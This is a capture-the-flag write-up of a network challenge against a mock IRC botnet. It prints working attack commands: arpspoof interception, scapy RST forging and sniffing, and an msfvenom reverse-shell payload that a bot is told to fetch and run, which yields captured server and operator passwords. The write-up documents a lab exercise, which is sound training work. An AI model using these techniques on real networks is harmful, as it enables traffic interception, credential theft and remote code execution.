Tags: networking 

Rating: 0

I loved the network challenges, and this was probably my favorite one. We were the second team to solve it.

```
Alt-F4 for Ops
Did you know that Alt-F4 is the shortcut for ops in IRC?

Difficulty: hard
```

Like with all other network challenges, we are given a VPN to connect to. The first thing I obviously did was to scan the network with nmap (the standard subnet for all challenges in this category was 172.30.0.0/28). Based on experience from previous challenges I expected to find an IRC server and at least one client talking to to it, but...

```
Nmap scan report for 172.30.0.1
Host is up (0.20s latency).
All 1000 scanned ports on 172.30.0.1 are closed

Nmap scan report for 172.30.0.2
Host is up (0.20s latency).
All 1000 scanned ports on 172.30.0.2 are closed

Nmap scan report for krzysh-laptop (172.30.0.14)
Host is up (0.00012s latency).
[this is my computer]

Nmap done: 16 IP addresses (3 hosts up) scanned in 102.10 seconds
```
Wait, what? Where is the IRC server? And why do we suddenly have something on .1 on the network, that never happened before.

Turns out, unlike all the other challenges, we are not dealing with simple LAN communication here, but rather something shaped more like traditional Internet, where 172.30.0.1 is the gateway to the rest of the network. I did an ARP spoof between the computer at .2 and the gateway at .1...

```
sudo arpspoof -i tap0 -r -t 172.30.0.2 172.30.0.1

```
![image](https://user-images.githubusercontent.com/1517255/53304497-4f586400-3876-11e9-8b8d-7ef319f1e407.png)
And there we go, some IRC communication with a server at 172.30.20.10! The obvious thing to try now is connecting to it using an IRC client like irssi (after setting up the routing to that network to go through the gateway on the VPN - `sudo route add -net 172.30.20.0/28 gw 172.30.0.1 dev tap0`), but...
```
20:44 -!- Irssi: Looking up 172.30.20.10
20:44 -!- Irssi: Connecting to 172.30.20.10 [172.30.20.10] port 6667
20:44 -!- Irssi: Connection to 172.30.20.10 established
20:44 !irc.hades.naum *** Looking up your hostname
20:44 !irc.hades.naum *** Couldn't look up your hostname
20:44 -!- Password incorrect
20:44 -!- ERROR Closing Link: 172.30.0.14 (Bad Password)
20:44 -!- Irssi: Connection lost to 172.30.20.10
```
Of course, that would be too easy. What we need to do is somehow force the client to reconnect so that we can capture the PASS command used during initial phase of the connection. Since we are already intercepting in the middle of the communication, we can easily do that by forging a RST TCP packet to kill the connection. I used a scapy script from here to do that: https://gist.github.com/spinpx/263a2ed86f974a55d35cf6c3a2541dc2

A few seconds after running this script, the client attempts to reconnect and we can grab the password command: `PASS underling`. I also noticed `JOIN #void`. So now, let's connect to the server and see what is going on in that channel.
![image](https://user-images.githubusercontent.com/1517255/53304498-52535480-3876-11e9-8834-8160be8e07d5.png)
This looks like a botnet C&C server, and the file from the payload URL is an ELF binary, perhaps we could send our own one instead? But first, lets look at who is connected
```
20:54 -!- #void krzys_h H 0 krzys_h@172.30.0.14 [krzys_h]
20:54 -!- #void imp63a3 H 0 imp@172.30.0.2 [imp63a3]
20:54 -!- #void impac66 H 0 imp@172.30.20.3 [impac66]
20:54 -!- #void lordbaal H*@ 0 eugene@172.30.20.2 [baal]
20:54 -!- End of /WHO list
```
We see two connected bots and *lordbaal* who seems to be the botnet owner. He is both channel operator (@) and server operator (*), so we are obviously going after him. Let's see some more info about him:
```
20:59 -!- lordbaal [eugene@172.30.20.2]
20:59 -!- ircname : baal
20:59 -!- channels : @#sanctum @#void
20:59 -!- server : irc.hades.naum [Hades IRC server]
20:59 -!- : Dark Lord of Hades
20:59 -!- idle : 0 days 0 hours 0 mins 1 secs [signon: Sun Feb 24 20:25:41 2019]
20:59 -!- End of WHOIS
```
Oh, another channel! Join it, maybe?
```
20:59 -!- #sanctum Cannot join channel (Only lords may enter the sanctum!)
```
Nah, the challenge wouldn't be classified as hard if it was that easy. Maybe we should "become a lord" by simply changing our username to be prefixed with "lord"?
```
21:01 -!- lordkrzys Only the chosen may adopt the title of lord!
```
Okay, I'm out of easy tricks. Let's try to intercept lordbaal's connection somehow. The problem is, he is in another network and ARP spoofing works only on the LAN - but luckily, while we are in a different network, one of the bots (impac66) seems to be on the LAN with the admin! Let's try to hack him first by following the format of payload commands.
```
21:04 < krzys_h> +impac66, payload http://172.30.0.14/my_reverse_shell_payload
21:04 < impac66> krzys_h, running...
```
where my_reverse_shell_payload was generated with `msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.30.0.14 LPORT=1234 -f elf`

After we got a shell, we have to repeat the process of killing the connection and sniffing we did in the first part... but on a remote computer using a dumb netcat shell. There was no arpspoof installed, but luckily scapy was so we could use that. I used the script from https://medium.com/@ismailakkila/black-hat-python-arp-cache-poisoning-with-scapy-7cb1d8b9d242 for the ARP spoofing part, and the previous one for forging RST. At the end I appended something to dump all traffic after sending the RST packet into the terminal:
```python
def on_packet(t):
t.show()

sniff(iface="eth0", count=1000, lfilter=lambda x: x.haslayer(TCP) and (x[IP].src == "172.30.20.2" or x[IP].dst == "172.30.20.2"), prn=on_packet)
```
By doing this, we can capture admin's login:
```
PASS suckitinnotech
:irc.hades.naum NOTICE * :*** Looking up your hostname
NICK baal
:irc.hades.naum NOTICE * :*** Your hostname contains illegal characters, ignoring hostname
USER eugene 0 * :baal
:irc.hades.naum NOTICE baal :*** You are exempt from resvs
:irc.hades.naum NOTICE baal :*** You are exempt from flood protection
:irc.hades.naum 001 baal :Welcome to the hades Internet Relay Chat Network baal!eugene@172.30.20.2
:irc.hades.naum 002 baal :Your host is irc.hades.naum[0.0.0.0/6667], running version hybrid-8.2.25
:irc.hades.naum 003 baal :This server was created Feb 22 2019 at 13:14:44
:irc.hades.naum 004 baal irc.hades.naum hybrid-8.2.25 DFGHRSWabcdefgijklnopqrsuwy bchiklmnoprstuveCILMNORST bkloveIh
:irc.hades.naum 005 baal CALLERID CASEMAPPING=ascii DEAF=D KICKLEN=180 MODES=6 PREFIX=(ohv)@%+ STATUSMSG=@%+ EXCEPTS INVEX NICKLEN=9 NETWORK=hades MAXLIST=beI:100 MAXTARGETS=4 :are supported by this server
:irc.hades.naum 005 baal CHANTYPES=# CHANLIMIT=#:25 CHANNELLEN=50 TOPICLEN=80 CHANMODES=beI,k,l,cimnprstuCLMNORST AWAYLEN=180 KNOCK ELIST=CMNTU SAFELIST WATCH=50 :are supported by this server
:irc.hades.naum 251 baal :There are 3 users and 1 invisible on 1 servers
:irc.hades.naum 254 baal 1 :channels formed
:irc.hades.naum 255 baal :I have 4 clients and 0 servers
:irc.hades.naum 265 baal :Current local users: 4 Max: 4
:irc.hades.naum 266 baal :Current global users: 4 Max: 4
:irc.hades.naum 250 baal :Highest connection count: 4 (4 clients) (26 connections received)
:irc.hades.naum 375 baal :- irc.hades.naum Message of the Day -
:irc.hades.naum 372 baal :- ,-.
:irc.hades.naum 372 baal :- ___,---.__ /'|`\\ __,---,___
:irc.hades.naum 372 baal :- ,-' \\` `-.____,-' | `-.____,-' // `-.
:irc.hades.naum 372 baal :- ,' | ~'\\ /`~ | `.
:irc.hades.naum 372 baal :- / ___// `. ,' , , \\___ \\
:irc.hades.naum 372 baal :- | ,-' `-.__ _ | , __,-' `-. |
:irc.hades.naum 372 baal :- | / /\\_ ` . | , _/\\ \\ |
:irc.hades.naum 372 baal :- \\ | \\ \\`-.___ \\ | / ___,-'/ / | /
:irc.hades.naum 372 baal :- \\ \\ | `._ `\\\\ | //' _,' | / /
:irc.hades.naum 372 baal :- `-.\\ /' _ `---'' , . ``---' _ `\\ /,-'
:irc.hades.naum 372 baal :- `` / \\ ,='/ \\`=. / \\ ''
:irc.hades.naum 372 baal :- |__ /|\\_,--.,-.--,--._/|\\ __|
:irc.hades.naum 372 baal :- / `./ \\\\`\\ | | | /,//' \\,' \\
:irc.hades.naum 372 baal :- / / ||--+--|--+-/-| \\ \\
:irc.hades.naum 372 baal :- | | /'\\_\\_\\ | /_/_/`\\ | |
:irc.hades.naum 372 baal :- \\ \\__, \\_ `~' _/ .__/ /
OPER baal darksecret
:irc.hades.naum 372 baal :- `-._,-' `-._______,-' `-._,-'
:irc.hades.naum 372 baal :-
NICK lordbaal
:irc.hades.naum 372 baal :- TURN BACK NOW!
:irc.hades.naum 376 baal :End of /MOTD command.
:irc.hades.naum NOTICE * :*** Notice -- baal!eugene@172.30.20.2{baal} is now an operator
:baal!eugene@172.30.20.2 MODE baal :+alosw
:irc.hades.naum 381 baal :You are now an IRC operator
:baal!eugene@172.30.20.2 NICK :lordbaal
:baal!eugene@172.30.20.2 NICK :lordbaal
JOIN #void
:lordbaal!eugene@172.30.20.2 JOIN :#void
:irc.hades.naum 353 lordbaal = #void :lordbaal impac66 imp63a3 krzys_h
:irc.hades.naum 366 lordbaal #void :End of /NAMES list.
JOIN #sanctum
:lordbaal!eugene@172.30.20.2 JOIN :#sanctum
:irc.hades.naum MODE #sanctum +nt
:irc.hades.naum 353 lordbaal = #sanctum :@lordbaal
:irc.hades.naum 366 lordbaal #sanctum :End of /NAMES list.
PRIVMSG #void :greetings, imps
PRIVMSG #sanctum :pretty lonely in here today...
```
Okay, so we have the server operator password! Let's just enter it in irssi (/oper username password)
```
21:22 -!- Only few of mere mortals may try to enter the twilight zone
```
Oh come on. Maybe we have to use his username (baal) when connecting?
```
21:23 -!- Only few of mere mortals may try to enter the twilight zone
```
Umm.. okay, at this point I noticed he used a different password for connecting to the server... maybe try that?
```
21:24 -!- ERROR Closing Link: 172.30.0.14 (Bad Password)
```
I give up, let's just stop using irssi and connect to the IRC server using netcat like a pr0 hacker
```
krzys_h@krzysh-laptop:~ $ nc 172.30.20.10 6667
:irc.hades.naum NOTICE * :*** Looking up your hostname
PASS suckitinnotech
NICK baal
USER eugene 0 * :baal
:irc.hades.naum NOTICE * :*** Couldn't look up your hostname
:irc.hades.naum NOTICE baal :*** You are exempt from resvs
:irc.hades.naum NOTICE baal :*** You are exempt from flood protection
:irc.hades.naum 001 baal :Welcome to the hades Internet Relay Chat Network baal!eugene@172.30.0.14
[... MOTD ...]
:irc.hades.naum 376 baal :End of /MOTD command.
OPER baal darksecret
:irc.hades.naum NOTICE * :*** Notice -- baal!eugene@172.30.0.14{baal} is now an operator
:baal!eugene@172.30.0.14 MODE baal :+alosw
:irc.hades.naum 381 baal :You are now an IRC operator
NICK lordkrzys
:baal!eugene@172.30.0.14 NICK :lordkrzys
JOIN #sanctum
:lordkrzys!eugene@172.30.0.14 JOIN :#sanctum
:irc.hades.naum 353 lordkrzys = #sanctum :lordkrzys @lordbaal
:irc.hades.naum 366 lordkrzys #sanctum :End of /NAMES list.
:lordbaal!eugene@172.30.20.2 PRIVMSG #sanctum :lordkrzys, who the hell are you?! gigem{command_and_out_of_control}
```
I think the problem was the hostname specified in the USER command. But whatever, we got the flag! It's a shame we don't see network challenges on CTFs more often, I really enjoyed this one.

Original writeup (https://github.com/made-in-mim/writeups/blob/master/2019-03-03-tamuctf/network-pentest/altf4/README.md).